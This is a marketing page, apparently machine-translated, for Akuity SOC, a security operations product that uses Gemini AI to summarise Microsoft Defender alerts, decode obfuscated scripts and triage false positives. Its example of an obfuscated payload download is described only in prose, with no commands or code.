Translate the complexity of
Defender threats with Google Gemini AI.
The main adversary of a SOC analyst is not always the hacker, it is the volume of data. Akuity SOC natively embeds Gemini AI to instantly translate complex JSON payloads, reduce mental fatigue and eliminate false positives.
Manual analysis of Defender logs destroys the productivity of your analysts
Tedious reading of raw JSON filescontaining thousands of lines. Manual decryption of obfuscated PowerShell scripts.
Instant summary: technical summary generated by AI as soon as the ticket is opened, in less than 3 seconds.
Manual report writingfor management taking hours for each critical incident.
Gemini Double Speech: raw engineer report + clear COMEX summary, generated simultaneously and automatically.
Humane processing of countless false positives: up to 80% of alert volume is unqualified background noise.
Out-of-band AI: automatic qualification of probable false positives with contextualized dangerousness score.
How Gemini AI is revolutionizing Defender log analysis
The Gemini Double Discourse (Tech & COMEX)
The analysis tab generates a summary atDouble Speech: a detailed technical description (attack vectors, processes involved) for the engineer, AND a popularized recommendation ready to be shared with the COMEX.
Contextual Chat Analyst & AI
The Ticket Panel includes achat powered by Geminiwho knows the full context of the ticket. Ask it to explain an obfuscated Base64 script, or generate a typical warning email to send to the compromised user.
Intelligent Reputation Analysis
When the AI encounters an IOC (SHA256 Hash, IP), it generates acontextual analyst notewith weighted dangerousness score. Bonus if the IP belongs to Azure/AWS, penalty if the domain is recent (< 100 days) with malware signature.
Qualification of an obfuscation attack in 3 steps
Detection — Unreadable CMD command on financial server
PupilMicrosoft Defender reports the execution of aObfuscated CMD commandon a financial server. The alert is classified as suspicious without being qualified.
AI Translation — Instant Deobfuscation
Gemini AI ActiveThe analyst opens the alert. Gemini has already deobfuscated the order, revealing aattempt to download payloadfrom a C2 domain. The COMEX summary is already ready.
Validation — The analyst confirms and isolates
True PositiveThe analyst uses theAI catto check the dangerousness of the IP via AlienVault OTX. Confident, he declares the alert as True Positive and initiates server isolation.
Deepen AI analysis of Defender logs
Why reading JSON Defender logs is your SOC’s worst enemy
Manually parsing Microsoft Defender JSON payloads slows down your incident response. Find out how AI automates this decryption.
Cognitive overload in SOC: How AI qualifies 50% of your false positives
Alert fatigue destroys the productivity of cyber analysts. Discover how out-of-band AI automatically qualifies background noise.
Decoding PowerShell obfuscation: Human analysis versus Gemini
Attackers hide their malicious code by encoding their scripts. Learn how Gemini AI instantly decodes PowerShell obfuscation.
The Double Cyber Discourse: How to translate logs for the Comex
In the midst of a cyber crisis, communication with management is strategic. Discover how Akuity SOC’s Double Discourse translates Defender logs for Comex.
Vertex AI and privacy: Why your logs don't train AI
The use of AI in cybersecurity raises privacy issues. Learn how Vertex AI and Akuity protect your Microsoft data.